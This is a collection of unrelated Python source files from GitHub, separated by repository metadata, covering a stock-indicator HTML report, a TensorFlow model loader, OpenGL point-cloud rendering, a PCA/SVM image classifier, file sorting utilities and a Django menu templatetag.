    head = head.format("span", "gt50", "gt26", "gt12", "ad")

    # report S&P500-wide indicators
    html += ("<h2> S&P500 </h2><pre>")
    html += head + "<br>"
    row = "{:>6s}: {:4d}, {:4d}, {:4d}, {:4d}<br>"
    for span in ["daily", "weekly"]:
        pop = get_broads(d_con, span, price_date)
        html += row.format(span, int(pop['gt50']), int(pop['gt26']),
                           int(pop['gt12']), int(pop['ad']))

    # report sector indicators
    html += ("</pre><h2> GISC Sectors </h2>\n<pre>")
    html += (head + ", {:>3s}, sector<br>".format("n"))
    row = "{:>6s}: {:4d}, {:4d}, {:4d}, {:4d}, {:3d}, {}<br>"
    for span in ["daily", "weekly"]:
        sectors = get_sectors(n_con)
        for sector, values in sectors.items():
            m = get_broads(d_con, span, price_date, values)
            html += row.format(span, int(m['gt50']), int(m['gt26']),
                               int(m['gt12']), int(m['ad']),
                               len(values), sector)
        html += "<br>"

    ##########################################################################
    # Individual short/long candidates
    ##########################################################################
    head = "{:>3s}, {:>8s}, {:>7s}, {:>6s}, {:>5s}, {:>5s}, {:>8s}, {:<s}\n"
    head = head.format("ID", "WEEKLIES", "DAILIES", "TICKER", "COUNT",
                       "CoV", "CLOSE($)", "SECTOR")
    if not args.select:
        # work with shorts
        shorts = get_shorts(n_con, "daily", price_date)
        esses = [get_ticker_info(d_con, short) for short in shorts]
        html += ("<h2> Daily Shorts </h2><pre>")
        html += head
        html += report_individuals(n_con, price_date, esses)
        # work with longs
        longs = get_longs(n_con, "daily", price_date)
        elles = [get_ticker_info(d_con, long) for long in longs]
        html += ("</pre><h2> Daily Longs </h2><pre>")
        html += head
        html += report_individuals(n_con, price_date, elles)
    else:
        # work with singles
        select = args.select.split(',')
        select = [int(s) for s in select]
        singles = [get_ticker_info(d_con, s) for s in select]
        html += ("</pre><h2> Daily Single(s) </h2><pre>")
        html += head
        html += report_individuals(n_con, price_date, singles)
    with open("inspection/{}.html".format(price_date), "w") as f:
        f.write(html + "<br><br></pre></body></html>")

    ##########################################################################
    # Generate Inpspection/Research Webpages
    ##########################################################################
    # set up data: per-date output directory for the bokeh pages
    date_dir = os.path.join(home, "inspection/{}".format(price_date))
    if not os.path.exists(date_dir):
        os.makedirs(date_dir)
    os.chdir(date_dir)

    # create inspection/research web pages
    for span in ["weekly", "daily"]:
        if not args.select:
            attitudes = {"longs": longs, "shorts": shorts}
        else:
            attitudes = {"select": select}
        for att in attitudes.keys():
            bokeh_pages(d_con, span, price_date, att, tickers=attitudes[att])

    # finally...
    d_con.close()
    n_con.close()
mcStargazer/hf
scan_db.py
scan_db.py
py
17,177
python
en
code
0
github-code
36
13442778323
import os import argparse import tensorflow as tf import numpy as np from load import load_graph os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' """ Adapted from https://gist.github.com/morgangiraud/4a062f31e8a7b71a030c2ced3277cc20#file-medium-tffreeze-3-py """ if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("-m", dest='model_filename', type=str, help="frozen model .pb file to import") args = parser.parse_args() graph = load_graph(args.model_filename) for op in graph.get_operations(): print(op.name) X = graph.get_tensor_by_name('prefix/X:0') keep_prob = graph.get_tensor_by_name('prefix/keep_prob:0') output = graph.get_tensor_by_name('prefix/output:0') with tf.Session(graph=graph) as sess: prediction = sess.run(output, feed_dict={ X: np.random.randn(40, 66, 200, 3) * 100, keep_prob: 1.0 }) print(prediction)
Yunski/nvidia-cnn
test_load.py
test_load.py
py
961
python
en
code
9
github-code
36
15820786578
# -*- coding: utf-8 -*- #+--------------------------------------------------------------------------+# # Importem mòduls # #+--------------------------------------------------------------------------+# from distancies import Cosinus, Intersection #+--------------------------------------------------------------------------+# # Definim les classes # #+--------------------------------------------------------------------------+# class Recuperador (): def __init__(self, document, database, t_document, t_distancia): self._t_document = t_document self._database = database self._document = [arxiu for arxiu in self._database if arxiu.file_name == document][0] self._distancies = [] if t_distancia == "cosinus": self._operador = Cosinus() else: self._operador = Intersection() def processa_recuperacio(self): for fitxer in self._database: if fitxer.file_name != self._document.file_name: self._distancies.append((fitxer, self._operador.calcula_distancia(self._document, fitxer))) self._distancies = sorted(self._distancies, key=lambda x: x[1]) def get_results(self): return [x[0] for x in self._distancies]
segama4/Image_Search_Engine
recuperador.py
recuperador.py
py
1,427
python
en
code
0
github-code
36
4712176028
import numpy as np import os import trimesh.points from abc import ABC from typing import List, Union from dataclasses import dataclass from OpenGL import GL as gl from .renderable import Renderable from .shaders.shader_loader import Shader from ..camera.models import BaseCameraModel, StandardProjectionCameraModel from .shadowmap import ShadowMap from .lights import Light class Pointcloud(Renderable, ABC): """ Abstract class for all pointcloud objects """ @dataclass class PointcloudContainer: vertices: np.ndarray colors: np.ndarray def __init__(self, camera: BaseCameraModel = None, draw_shadows: bool = True, generate_shadows: bool = True): super().__init__(camera, draw_shadows, generate_shadows) self.render_back = True class SimplePointcloud(Pointcloud): """ Pointcloud with simple rendering algorithm: one point - one color (only ambient lightning) """ def __init__(self, *args, **kwargs): """ Args: camera (BaseCameraModel): main camera shadowmaps (List[ShadowMap]): list of shadowmaps (no more than Renderable.SHADOWMAPS_MAX) additional_lights: list of lights """ super().__init__(*args, **kwargs) def _init_shaders(self, camera_model, shader_mode): self.shader = shader = Shader() dirname = os.path.dirname(os.path.abspath(__file__)) if self.draw_shadows: shader.initShaderFromGLSL([os.path.join(dirname, f"shaders/simple_pointcloud/shadowdraw/vertex_{camera_model}.glsl")], [os.path.join(dirname, "shaders/simple_pointcloud/shadowdraw/fragment.glsl")], [os.path.join(dirname, "shaders/simple_pointcloud/shadowdraw/geometry.glsl")]) self.context.shader_ids.update(self.locate_uniforms(self.shader, ['shadowmap_MVP', 'shadowmap_enabled', 'shadowmaps', 'shadow_color'])) else: shader.initShaderFromGLSL([os.path.join(dirname, f"shaders/simple_pointcloud/vertex_{camera_model}.glsl")], [os.path.join(dirname, "shaders/simple_pointcloud/fragment.glsl")], [os.path.join(dirname, "shaders/simple_pointcloud/geometry.glsl")]) self.context.shader_ids.update(self.locate_uniforms(self.shader, 
['splat_size'])) if self.generate_shadows: shadowgen_shader = self.shadowgen_shader = Shader() shadowgen_shader.initShaderFromGLSL([os.path.join(dirname, f"shaders/simple_pointcloud/shadowgen/vertex_{camera_model}.glsl")], [os.path.join(dirname, "shaders/simple_pointcloud/shadowgen/fragment.glsl")], [os.path.join(dirname, "shaders/simple_pointcloud/shadowgen/geometry.glsl")]) self.shadowgen_context.shader_ids.update(self.locate_uniforms(self.shadowgen_shader, ['splat_size'])) def _finalize_init(self): self.set_splat_size(0.5) def _delete_buffers(self): gl.glDeleteBuffers(2, [self.context.vertexbuffer, self.context.colorbuffer]) gl.glDeleteVertexArrays(1, [self.context.vao]) def _set_buffers(self, pointcloud: Union[Pointcloud.PointcloudContainer, trimesh.points.PointCloud]): glverts = np.copy(pointcloud.vertices.astype(np.float32), order='C') glcolors = np.copy(pointcloud.colors.astype(np.float32) / 255., order='C') assert len(glverts)==len(glcolors), "PC vertices and colors length should match" self.nglverts = len(glverts) self.context.vao = gl.glGenVertexArrays(1) gl.glBindVertexArray(self.context.vao) self.context.vertexbuffer = gl.glGenBuffers(1) gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.context.vertexbuffer) gl.glBufferData(gl.GL_ARRAY_BUFFER, glverts.nbytes, glverts, gl.GL_STATIC_DRAW) self.context.colorbuffer = gl.glGenBuffers(1) gl.glBindBuffer( gl.GL_ARRAY_BUFFER, self.context.colorbuffer) gl.glBufferData( gl.GL_ARRAY_BUFFER, glcolors.nbytes, glcolors, gl.GL_STATIC_DRAW) def _update_buffers(self, pointcloud: Union[Pointcloud.PointcloudContainer, trimesh.points.PointCloud]): glverts = np.copy(pointcloud.vertices.astype(np.float32), order='C') glcolors = np.copy(pointcloud.colors.astype(np.float32) / 255., order='C') gl.glBindVertexArray(self.context.vao) gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.context.vertexbuffer) gl.glBufferData(gl.GL_ARRAY_BUFFER, glverts.nbytes, glverts, gl.GL_DYNAMIC_DRAW) gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.context.colorbuffer) 
gl.glBufferData(gl.GL_ARRAY_BUFFER, glcolors.nbytes, glcolors, gl.GL_DYNAMIC_DRAW) def set_splat_size(self, splat_size): self.context.splat_size = splat_size def get_splat_size(self): return self.context.splat_size def _upload_uniforms(self, shader_ids, lights=(), shadowmaps=()): gl.glUniform1f(shader_ids['splat_size'], self.context.splat_size) shadowmaps_enabled = np.zeros(self.SHADOWMAPS_MAX, dtype=np.int32) shadowmaps_enabled[:len(shadowmaps)] = 1 M = self.context.Model shadowmaps_lightMVP = [np.array(s.light_VP*M) for s in shadowmaps] shadowmaps_lightMVP = np.array(shadowmaps_lightMVP, dtype='f4') if self.draw_shadows: gl.glUniform1iv(self.context.shader_ids['shadowmap_enabled'], self.SHADOWMAPS_MAX, shadowmaps_enabled) gl.glUniformMatrix4fv(self.context.shader_ids['shadowmap_MVP'], len(shadowmaps), gl.GL_TRUE, shadowmaps_lightMVP) gl.glUniform4f(self.context.shader_ids['shadow_color'], *self.shadowcolor) for shadow_ind, shadowmap in enumerate(shadowmaps): gl.glActiveTexture(gl.GL_TEXTURE0+shadow_ind) gl.glBindTexture(gl.GL_TEXTURE_2D, shadowmap.texture) def _upload_shadowngen_uniforms(self, shader_ids): gl.glUniform1f(shader_ids['splat_size'], self.context.splat_size) def _draw(self, reset: bool, lights: List[Light], shadowmaps: List[ShadowMap]) -> bool: """ Internal draw pass Args: reset (bool): Reset drawing progress (for progressive drawing) lights (List[Light]): All light objects that influence the current object shadowmaps (List[ShadowMap]): List of shadowmaps to draw shadows from Returns: bool: if drawing buffer was changed (if something was actually drawn) """ if not reset: return False if not self.render_back: if np.array(self.context.MV).dot(np.array([0, 0, 1, 0]))[2] <= 0: return False self.shader.begin() self.upload_uniforms(self.context.shader_ids, lights, shadowmaps) gl.glBindVertexArray(self.context.vao) gl.glEnableVertexAttribArray(0) gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.context.vertexbuffer) gl.glVertexAttribPointer(0, 3, gl.GL_FLOAT, 
gl.GL_FALSE, 0, None) gl.glEnableVertexAttribArray(1) gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.context.colorbuffer) gl.glVertexAttribPointer(1, 4, gl.GL_FLOAT, gl.GL_FALSE, 0, None) gl.glDrawArrays(gl.GL_POINTS, 0, self.nglverts) gl.glDisableVertexAttribArray(0) gl.glDisableVertexAttribArray(1) self.shader.end() return True def _draw_shadowmap(self, shadowmap_camera: StandardProjectionCameraModel) -> bool: """ Shadow map draw pass - just to get depthmap values Args: shadowmap_camera (StandardProjectionCameraModel): perspective/ortho camera for shadow calculation Returns: bool: if drawing buffer was changed (if something was actually drawn) """ self.shadowgen_shader.begin() self.upload_shadowgen_uniforms(shadowmap_camera, self.shadowgen_context.shader_ids) gl.glBindVertexArray(self.context.vao) gl.glEnableVertexAttribArray(0) gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.context.vertexbuffer) gl.glVertexAttribPointer(0, 3, gl.GL_FLOAT, gl.GL_FALSE, 0, None) gl.glEnableVertexAttribArray(1) gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.context.colorbuffer) gl.glVertexAttribPointer(1, 4, gl.GL_FLOAT, gl.GL_FALSE, 0, None) gl.glDrawArrays(gl.GL_POINTS, 0, self.nglverts) gl.glDisableVertexAttribArray(0) gl.glDisableVertexAttribArray(1) self.shadowgen_shader.end() return True class SimplePointcloudProgressive(SimplePointcloud): """ SimplePointcloud with progressive drawing support """ def __init__(self, *args, progressive_draw_size: int = None, progressive_draw_shuffle: bool = False, **kwargs): """ Args: camera (BaseCameraModel): main camera shadowmaps (List[ShadowMap]): list of shadowmaps (no more than Renderable.SHADOWMAPS_MAX) additional_lights: list of lights progressive_draw_size (int): number of points draw in one pass, None for all progressive_draw_shuffle (bool): whether to shuffle drawing order during pointcloud load """ super().__init__(*args, **kwargs) self.progressive_draw_size = progressive_draw_size self.progressive_draw_shuffle = progressive_draw_shuffle 
self.is_progressive = True self.current_offset = 0 def _generate_indices(self, verts_count): inds = np.arange(verts_count, dtype=np.uint32) if self.progressive_draw_shuffle: np.random.shuffle(inds) return inds def _set_buffers(self, pointcloud: Pointcloud.PointcloudContainer): if self.progressive_draw_shuffle: inds = self._generate_indices(len(pointcloud.vertices)) pointcloud = self.PointcloudContainer(pointcloud.vertices[inds], pointcloud.colors[inds]) super()._set_buffers(pointcloud) self.current_offset = 0 def _update_buffers(self, pointcloud: Pointcloud.PointcloudContainer): if self.progressive_draw_shuffle: inds = self._generate_indices(len(pointcloud.vertices)) pointcloud = self.PointcloudContainer(pointcloud.vertices[inds], pointcloud.colors[inds]) super()._update_buffers(pointcloud) self.current_offset = 0 def _draw(self, reset: bool, lights: List[Light], shadowmaps: List[ShadowMap]) -> bool: if not self.render_back: if np.array(self.context.MV).dot(np.array([0, 0, 1, 0]))[2] <= 0: return False if reset: self.current_offset = 0 if self.current_offset >= self.nglverts: return False self.shader.begin() self.upload_uniforms(self.context.shader_ids, lights, shadowmaps) gl.glBindVertexArray(self.context.vao) gl.glEnableVertexAttribArray(0) gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.context.vertexbuffer) gl.glVertexAttribPointer(0, 3, gl.GL_FLOAT, gl.GL_FALSE, 0, None) gl.glEnableVertexAttribArray(1) gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.context.colorbuffer) gl.glVertexAttribPointer(1, 4, gl.GL_FLOAT, gl.GL_FALSE, 0, None) if self.progressive_draw_size is None: gl.glDrawArrays(gl.GL_POINTS, 0, self.nglverts) self.current_offset += self.nglverts else: curr_len = min(self.progressive_draw_size, self.nglverts - self.current_offset) gl.glDrawArrays(gl.GL_POINTS, self.current_offset, curr_len) self.current_offset += self.progressive_draw_size gl.glDisableVertexAttribArray(0) gl.glDisableVertexAttribArray(1) self.shader.end() return True
vguzov/cloudrender
cloudrender/render/pointcloud.py
pointcloud.py
py
12,029
python
en
code
16
github-code
36
1812506827
import os import re import torch from PIL import Image from torch.utils.data import Dataset import torchvision.transforms as T import utils class MyDataset(Dataset): def __init__(self, file_list: list, name2label, transform_flag=True): self.file_list = file_list self.name2label = name2label self.transform_flag = transform_flag self.aug_transforms = T.Compose([ # T.Resize((256, 256)), T.ColorJitter(), T.RandomRotation(30), T.RandomHorizontalFlip(p=0.5), T.RandomVerticalFlip(p=0.5), ]) def __getitem__(self, item): image, label = self.transform(self.file_list[item], transform_flag=self.transform_flag) return image, label # @classmethod def transform(self, filename, transform_flag): # preprocess (default Identity) image = Image.open(filename) if transform_flag: image = self.aug_transforms(image) image = T.ToTensor()(image) class_name = re.findall('\w+_[0-9]', os.path.split(filename)[-1])[0][:-2] label = self.name2label[class_name] return image, label def __len__(self): return len(self.file_list)
newchexinyi/mobilefacenet
dataset.py
dataset.py
py
1,225
python
en
code
0
github-code
36
7702285883
# names = ['heier1', 'heier2', 'heier3'] # for name in names: # print( name ) sum = 0 for x in list( range(101) ): sum += x print( sum ) sum = 0 n = 100 while n > 0: sum = sum + n n = n - 2 print(sum)
Heier2013/learn_python
cycle.py
cycle.py
py
220
python
en
code
0
github-code
36
5950813494
import os class Weapon: stats = { "name": "Default_Weapon", "dmg": 1 } def __init__(self, weapon): # Select Weapon File weapon_path = "game\data\weapons" # Parsing Data try: with open(weapon_path + '/' + weapon, "r") as weapon_values: for line in weapon_values: newline = line.split('=') name = newline[0].rstrip() # Removing newline characters weapon_value = newline[1].rstrip() self.stats[name] = weapon_value except IOError as e: # Error for not finding save file os.system("cls||clear") print("Enemy Instantiation Save File Error") def load_name(self): return str(self.stats["name"]) def load_dmg(self): return int(self.stats["dmg"])
jalowe13/The-One-Python
The-One-Python/The-One-Python/game/mechanics/weapon.py
weapon.py
py
869
python
en
code
0
github-code
36
8254895274
import sys grades = {'Biology':80, 'Physics':88, 'Chemistry':98, 'Math':89, 'English':79, 'Music':67, 'History':68, 'Art':53, 'Economics':95, 'Psychology':88} def g (x): y = {} for key, value in grades.items(): if key != x: y[key] = value mean = sum(y.values()) / len(y) mean1 = round(mean, 2) print(mean1) g(sys.argv[1])
bferguson02/Python_Programs
grades.py
grades.py
py
361
python
en
code
0
github-code
36
44265086055
import numpy as np import matplotlib.pyplot as plt import matplotlib.animation as animation import pandas as pd df = pd.read_csv("File.txt", sep=" ") #print(df) moviewriter = animation.FFMpegWriter( fps=60) fig = plt.figure(figsize=(12, 6)) with moviewriter.saving(fig, 'myfile.mp4', dpi=100): integration_time = 100 i = integration_time end = len(df.get("x")) while( i < end): ax = fig.add_subplot(121) ax2 = fig.add_subplot(122) ax.set_xlabel('X') ax.set_xlim([-0.02, 0.02]) ax.set_ylim([-0.02, 0.02]) ax.set_ylabel('Y') ax2.set_xlim([-0.02, 0.02]) ax2.set_xlabel('Z') ax2.set_ylim([-0.02, 0.02]) ax2.set_ylabel('Y') for j in range(i - integration_time, i): ax.plot(df.get("x")[j],df.get("y")[j], 'ko') ax2.plot(df.get("z")[j],df.get("y")[j], 'ko') print(j) moviewriter.grab_frame() i += 50 fig.clear() moviewriter.finish()
josephmckenna/2021_April_IOP_IntroductionToCpp_Part1
extras/AnimateFigure.py
AnimateFigure.py
py
1,004
python
en
code
6
github-code
36
19245162119
''' CS5001 Fall 2022 Elif Tirkes Homework 3: What color is that square? ''' from chessboard import check_valid_row from chessboard import check_valid_column def main(): test_squares() def test_column_validity(): ''' Function -- test_column_validity presents three string-only test cases for the function check_valid_column Parameters: N/A, calls for the check_valid_row and check_valid_column with set inputs Returns printed expected and actual results for the 3 tests for the check_valid_column function ''' col_test_1 = check_valid_column("v") col_test_2 = check_valid_column("Z") col_test_3 = check_valid_column("B") col_test_4 = check_valid_column("A") # Column Test 1 print(f"\n*****\nColumn v: Expected: False, Actual: {col_test_1}") # Column Test 2 print(f"Column Z: Expected: False, Actual: {col_test_2}") # Column Test 3 print(f"Column B: Expected: True, Actual: {col_test_3}") # Column Test 4 print(f"Column A: Expected: True, Actual: {col_test_4}\n*****\n") def test_row_validity(): ''' Function -- check_row_validity presents three string-only test cases for the function check_valid_row Parameters: N/A, calls for the check_valid_row with set inputs Returns printed expected and actual results for the 3 tests for the check_valid_row ''' row_test_1 = check_valid_row(8) row_test_2 = check_valid_row(10) row_test_3 = check_valid_row(999) row_test_4 = check_valid_row(1) # Row Test 1 print(f"\n*****\nRow 8: Expected: True, Actual: {row_test_1}") # Row Test 2 print(f"Row 10: Expected: False, Actual: {row_test_2}") # Row Test 3 print(f"Row 999: Expected: False, Actual: {row_test_3}") # Row Test 4 print(f"Row 1: Expected: True, Actual: {row_test_4}\n*****\n") def test_squares(): ''' Function -- test_squares calls test_row_validity() and test_column_validity() Returns results for test_row_validity() and test_column_validity() ''' test_row_validity() test_column_validity() if __name__ == "__main__": main()
skippyskiddy/Python-Projects
Pokemon & Chess - Loops & Conditionals/test_squares.py
test_squares.py
py
2,210
python
en
code
0
github-code
36
35681548851
import os import sys import cv2 import time import pickle import numpy as np import pandas as pd from sklearn.decomposition import PCA from sklearn.svm import SVC from sklearn.metrics import confusion_matrix,accuracy_score,f1_score def generate_pca_dataset(datapath): time1 = time.clock() folders = [ '00000001', '00000002', '00000003', '00000004', '00000005', '00000006', '00000007', '00000008', '00000009', '00000010', '00000011', '00000012', '00000013', '00000014', '00000015', '00000016', '00000017', '00000018', '00000019', '00000020', '00000021', '00000022', '00000023', '00000024', '00000025', '00000026', '00000027', '00000028', '00000029', '00000030', '00000031', '00000032', '00000033', '00000034', '00000035', '00000036', '00000037', '00000038', '00000039', '00000040', '00000041', '00000042', '00000043', '00000044', '00000045', '00000046', '00000047', '00000048', '00000049', '00000050'] gray_list = [] for folder in folders: all_files = os.listdir(datapath+"/"+folder+"/") png_files = [] for file in all_files: png_files.append(file) if ('.png' in file) else None for file in png_files: gray_list.append(np.float32(np.ravel(cv2.cvtColor(cv2.imread(datapath+"/"+folder+"/"+file)[32:196,11:153,:], cv2.COLOR_BGR2GRAY))/255.0)) del(all_files) del(png_files) a = np.array(gray_list) del(gray_list) del(folders) time2 = time.clock() print("Time taken to generate dataset for PCA -> " + str(time2-time1)) return a def pca_transform_folder_wise(datapath,my_pca): time1 = time.clock() folder_list = os.listdir(datapath+"/") counter = 0 for folder in folder_list: time2 = time.clock() print(folder) all_files = os.listdir(datapath+"/"+folder+"/") png_files = [] for file in all_files: png_files.append(file) if ('.png' in file) else None curr_data = [] for file in png_files: curr_data.append(my_pca.transform(np.float32(np.ravel(cv2.cvtColor(cv2.imread(datapath+"/"+folder+"/"+file)[32:196,11:153,:], cv2.COLOR_BGR2GRAY)).reshape(1,-1)/255.0)).tolist()) del(all_files) del(png_files) 
svm_train_x = open(datapath+"/"+folder+"/pca_normalized_transform_list",'ab') pickle.dump(curr_data,svm_train_x) svm_train_x.close() time3 = time.clock() print("Time taken to generate and store pickle = " + str(time3-time2)) time3 = time.clock() print("Time taken to generate all pickle files folder wise = " + str(time3-time1)) def synthesize_svm_data(datapath,my_pca,name,reward_avail): time1 = time.clock() folder_list = os.listdir(datapath+"/") if reward_avail==1: folder_list.remove("rewards.csv") reward_list = np.array(pd.read_csv(datapath + "/rewards.csv",header=None,dtype=int))[:,1].tolist() list_for_array = [] for folder in folder_list: all_files = os.listdir(datapath+"/"+folder+"/") png_files = [] curr_data = [] for file in all_files: png_files.append(file) if ('.png' in file) else None for file in png_files: curr_data.extend(my_pca.transform(np.float32(np.ravel(cv2.cvtColor(cv2.imread(datapath+"/"+folder+"/"+file)[32:196,11:153,:], cv2.COLOR_BGR2GRAY)).reshape(1,-1)/255.0).tolist())) list_for_array.append(curr_data) del(curr_data) del(all_files) del(png_files) time2 = time.clock() print("Time taken to generate list = " + str(time2-time1)) svm_val_x = open(name+"x",'ab') pickle.dump(list_for_array,svm_val_x) svm_val_x.close() time3 = time.clock() print("Time taken to generate pickle file for x = " + str(time3-time2)) if reward_avail==1: svm_val_y = open(name+"y",'ab') pickle.dump(reward_list,svm_val_y) svm_val_y.close() time4 = time.clock() print("Time taken to generate pickle file for y = " + str(time4-time3)) def get_train_data(datapath,num_folders): time1 = time.clock() train_x = [] train_y = [] folder_list = os.listdir(datapath+"/") for folder_idx in range(num_folders): folder = folder_list[folder_idx] time2 = time.clock() reward_array = np.array(pd.read_csv(datapath+"/"+folder+"/rew.csv",dtype=int)).tolist() pickle_file = open(datapath+"/"+folder+"/pca_normalized_transform_list",'rb') curr_data = pickle.load(pickle_file) pickle_file.close() 
del(pickle_file) for last_frame in range(6,len(curr_data)-3,1): frame_num_list = [x for x in range(last_frame-6,last_frame+1)] data = [] for frame_num in frame_num_list: data.append(curr_data[frame_num][0]) if reward_array[last_frame+1]==1: for drop1 in range(5): for drop2 in range(drop1+1,6): new_list = [y for y in [0,1,2,3,4,5,6] if y not in [drop1,drop2]] new_data = [] for idx in new_list: new_data.extend(data[idx]) train_x.append(new_data) train_y.append(reward_array[last_frame+1][0]) if last_frame%3==0: train_x.append(new_data) train_y.append(reward_array[last_frame+1][0]) del(new_list) del(new_data) else: count_max = folder_idx%2 for count in range(count_max): drop1 = 0 drop2 = 0 while drop1==drop2: drop1 = np.random.randint(6) drop2 = np.random.randint(6) new_list = [y for y in [0,1,2,3,4,5,6] if y not in [drop1,drop2]] new_data = [] for idx in new_list: new_data.extend(data[idx]) train_x.append(new_data) train_y.append(reward_array[last_frame+1][0]) del(new_list) del(new_data) del(data) del(frame_num) del(frame_num_list) time3 = time.clock() print("Time taken to generate data from "+folder+" -> "+str(time3-time2)) time2 = time.clock() print("Total time taken to generate train data -> " + str(time2-time1)) return train_x,train_y def get_test_data(val_or_test,reward_avail): path = "" val_x = [] if val_or_test==0: path = "./pca_val_normalized" else: path = "pca_test_normalized" # Loading the x file pickle_file = open(path+"x",'rb') data_dash = pickle.load(pickle_file) pickle_file.close() for i in range(len(data_dash)): curr_data = [] for j in range(5): curr_data.extend(data_dash[i][j]) val_x.append(curr_data) if val_or_test==1: return val_x else: pickle_file = open(path+"y",'rb') data_dash = pickle.load(pickle_file) pickle_file.close() return val_x,data_dash def main(): dataset = generate_pca_dataset("../train_dataset") pca_dataset_pickle_file = open("pca_dataset_pickle",'rb') dataset = pickle.load(pca_dataset_pickle_file) my_pca = PCA(n_components=50) 
my_pca.fit(dataset) del(dataset) pca_transform_folder_wise("../train_dataset",my_pca) synthesize_svm_data("../validation_dataset",my_pca,"pca_val_normalized",1) synthesize_svm_data("../test_dataset",my_pca,"pca_test_normalized",0) del(my_pca) time1 = time.clock() num_folders = 500 train_x,train_y = get_train_data("../train_dataset",num_folders) time2 = time.clock() print("Training data read in " + str(time2-time1)) val_x,val_y = get_test_data(0,1) test_x = get_test_data(1,0) penalty = 5 gamma = "auto" print("Val and test data read") time3 = time.clock() linear_svm = SVC(C=penalty,kernel='linear',max_iter=4000) linear_svm.fit(train_x,train_y) time4 = time.clock() print("Linear trained in " + str(time4-time3)) time5 = time.clock() gaussian_svm = SVC(C=penalty,kernel='rbf',gamma=gamma,max_iter=4000) gaussian_svm.fit(train_x,train_y) time6 = time.clock() print("Gaussian trained in " + str(time6-time5)) linear_svm_pickle = open("svm_linear_trained",'ab') pickle.dump(linear_svm,linear_svm_pickle) linear_svm_pickle.close() gaussian_svm_pickle = open("gaussian_svm_trained",'ab') pickle.dump(gaussian_svm,gaussian_svm_pickle) gaussian_svm_pickle.close() linear_svm_pickle = open("svm_linear_trained",'rb') linear_svm = pickle.load(linear_svm_pickle) linear_svm_pickle.close() gaussian_svm_pickle = open("gaussian_svm_trained",'rb') gaussian_svm = pickle.load(gaussian_svm_pickle) gaussian_svm_pickle.close() linear_pred_lbl = linear_svm.predict(train_x) print("Linear Model with penalty = " + str(penalty) + ": ") print("Train Accuracy -> " + str(accuracy_score(np.array(train_y),linear_pred_lbl))) print("Train F1_score -> " + str(f1_score(np.array(train_y),linear_pred_lbl,average="micro"))) print(confusion_matrix(np.array(train_y),linear_pred_lbl)) print(f1_score(np.array(train_y),linear_pred_lbl)) linear_pred_lbl = linear_svm.predict(val_x) print("Test Accuracy -> " + str(accuracy_score(np.array(val_y),linear_pred_lbl))) print("Test F1_score -> " + 
str(f1_score(np.array(val_y),linear_pred_lbl,average="micro"))) print(confusion_matrix(np.array(val_y),linear_pred_lbl)) print(f1_score(np.array(val_y),linear_pred_lbl)) # time5 = time.clock() gaussian_pred_lbl = gaussian_svm.predict(train_x) print("Gaussian Model with penalty = " + str(penalty) + " and gamma = " + str(gamma)) print("Train Accuracy -> " + str(accuracy_score(np.array(train_y),gaussian_pred_lbl))) print("Train F1_score -> " + str(f1_score(np.array(train_y),gaussian_pred_lbl,average="micro"))) print(confusion_matrix(np.array(train_y),gaussian_pred_lbl)) print(f1_score(np.array(train_y),gaussian_pred_lbl)) gaussian_pred_lbl = gaussian_svm.predict(val_x) print("Test Accuracy -> " + str(accuracy_score(np.array(val_y),gaussian_pred_lbl))) print("Test F1_score -> " + str(f1_score(np.array(val_y),gaussian_pred_lbl,average="micro"))) print(confusion_matrix(np.array(val_y),gaussian_pred_lbl)) print(f1_score(np.array(val_y),gaussian_pred_lbl)) columns = ["Prediction"] linear_test_pred = np.ravel(linear_svm.predict(test_x)).tolist() gaussian_test_pred = np.ravel(gaussian_svm.predict(test_x)).tolist() pd.DataFrame(np.array(linear_test_pred)).to_csv("linear_svm_prediction.csv",header=columns,index=True) pd.DataFrame(np.array(gaussian_test_pred)).to_csv("gaussian_svm_prediction.csv",header=columns,index=True) if __name__ == '__main__': main()
pradyumnameena/COL774-Machine-Learning
Assignment-4/pca.py
pca.py
py
9,783
python
en
code
0
github-code
36
38110745441
import os import shutil from pathlib import Path def checkPathExists(filePath): if not (os.path.exists(filePath)): errorMessage = f'File Path not found: {filePath}' print(errorMessage) raise FileNotFoundError(errorMessage) def recreateFolderPath(filepath): if not (os.path.exists(filepath)): print(f'Creating filepath: {filepath}') os.mkdir(filepath) else: print(f'Recreating filepath: {filepath}') shutil.rmtree(filepath) os.mkdir(filepath) def sortFilesByExtension(filePath): #moves files to subfolders based on their extension type #to make loading a bit easier print('Sorting files by extension type') fileExtensions = set() files = [] for file in os.listdir(filePath): if os.path.isfile(os.path.join(filePath, file)): files.append(file) fileExtensions.add(Path(file).suffix) #create/recreate empty subfolders for fileExtension in fileExtensions: fileExtensionFolderName = fileExtension.replace('.','') print(fileExtensionFolderName) recreateFolderPath(os.path.join(filePath, fileExtensionFolderName)) for file in files: fileExtensionFolderName = Path(file).suffix.replace('.','') oldFilePath = os.path.join(filePath, file) newFilePath = os.path.join(filePath, fileExtensionFolderName, file) print(f'Moving {oldFilePath} to {newFilePath}') shutil.move(oldFilePath, newFilePath)
ibaadaleem/filmDatabase
fileManagement.py
fileManagement.py
py
1,354
python
en
code
0
github-code
36
40165431906
# -*- encoding: utf-8 -*- from django import template from django.contrib import admin from django.conf import settings register = template.Library() ''' templatetag, obtiene la configuración del menú ''' def get_config_menu(): return Menu.get_menu(self) register.filter('get_config_menu') class Menu(object): menu_key = 'SOMBRA_MENU' def __init__(self): return None def get_default_menu(self): ''' Devuelve las opciones por defecto del menú ''' return { 'MENU': ( 'sites', {'label': 'Custom', 'icon':None, 'models': ( 'auth.group', {'model': 'auth.user', 'label': 'Staff'} )}, ), 'LIST_PER_PAGE': 20, } def get_menu(self, param=None): ''' Obtiene la configuración de settings.py Ex: get_menu() Ex: get_menu('MENU') return dicc ''' if hasattr(settings, menu_key): menu = getattr(settings, menu_key, {}) else: menu = get_default_menu() if param: menu_value = menu.get(param) return menu_value return menu
elmanos/vari
vari/localesapp/templatetags/menu.py
menu.py
py
1,276
python
es
code
0
github-code
36
13123666146
